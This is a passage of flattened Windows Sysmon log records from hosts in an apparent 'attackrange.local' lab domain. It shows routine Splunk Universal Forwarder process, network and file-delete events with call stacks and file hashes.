+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806525Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806524Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806523Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.626{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806522Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.611{0C1E0330-F353-60EB-4E79-00000000D001}1532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000806521Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:25.290{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57189-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000806520Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:27.079{0C1E0330-F352-60EB-4D79-00000000D001}38882420C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806552Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.813{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C3E47B291A5F6B442DCF95B000BB0ED9,SHA256=01E9230B170A219D3A3EC1F2BE7489E74EAFB80CA61B692B77294BA18B46F5AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046698Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:28.656{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=42D11B1F7A9835F1078CE6F2229BC346,SHA256=D2FD78C607BED348B71085019D39787476634DA891486F28F59C72BF314AA20B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806551Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.423{0C1E0330-F354-60EB-4F79-00000000D001}15202912C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806550Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806549Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806548Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806547Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806546Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806545Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806544Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806543Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806542Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806541Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806540Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806539Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.282{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806538Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.267{0C1E0330-F354-60EB-4F79-00000000D001}1520C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806537Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:28.157{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=6465314F05003E2DBE9B9D95C10AD84E,SHA256=A009A180B4489E553A9B4A391FA2A115A3BB4B322CBA6776ED5327227D940C19,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806554Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:29.845{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D494722E8726B7405D5D4053539DDB7,SHA256=96A20DD0B56903AFA6BD08C43BB8454466BDC5C61073B21C52A43B8FFE842EC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046699Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:29.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7E48EF48A0536A1555F2275D02A082E,SHA256=AF131505DDC23A481D3F9398B4CB4478E5B7704D5D25B25184649F5891BD4EE4,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806553Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:29.329{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B14B97E1DEBB2F389C9866422928D3DC,SHA256=23288CE851C87801EA1739F1C2FD30BBB6322ED4B7F1461AAA29BE972723B74C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806556Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:30.860{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67ADAB24D3EC4038A25DDF6F50539DB9,SHA256=9CD3817201CA555AB6CCAA53F8B392C72173E531448F9EA96CC5C040DDBCC21D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046700Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:30.687{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A48B61D9724FEC5DE707A498453951F2,SHA256=2E9108651E8D8C5159CB58AA84A64187449A365FFA708F60599BFBE357C492C0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806555Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:30.063{0C1E0330-0490-60E8-1200-00000000D001}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=EBB4195CA1A3A3D6A53E4A12138C757D,SHA256=10A16A33CE3687198F34E3F9EF058DA81E7D90EE3B4A939A928FC4C751C9E06F,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806557Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:31.891{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E556968F159BEC8C8CC21354EF29539,SHA256=F3001B262E6198F87F86FF6490EAF4324316AA35B9FA8962D2AE4F66152EDDF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046701Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:31.704{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87ECCFCF7E79C9BD9FA002B6395E4557,SHA256=7CC9F5DF709A871B21C365D2958AD6A4A9BAD0143D7FE2AD52B749CFF48DA9C4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806559Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:32.907{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24FE51639AD0A0C2FEFB0B59E290D903,SHA256=336F97E0A5BCD0A1A44BE5E58C746B23794AE0F513E168AE5B0F12554F0BBE6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046702Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:46:32.722{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24EB1F6A4910C1ACE722BBD8B123BA05,SHA256=181E915E15185EB63BA263F1BC0D6E5FC1E7BEE96F15C56933403AA4F71DBCA2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806558Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:31.196{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57190-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806560Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:46:33.908{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FA0CEB49C0985E6CF117AB683DB0AF1,SHA256=26D10F8AFDE011BA3C1CD05FBA4A257C20DA3F2A8A2400BBCB449BE6F7EF2432,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046703Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 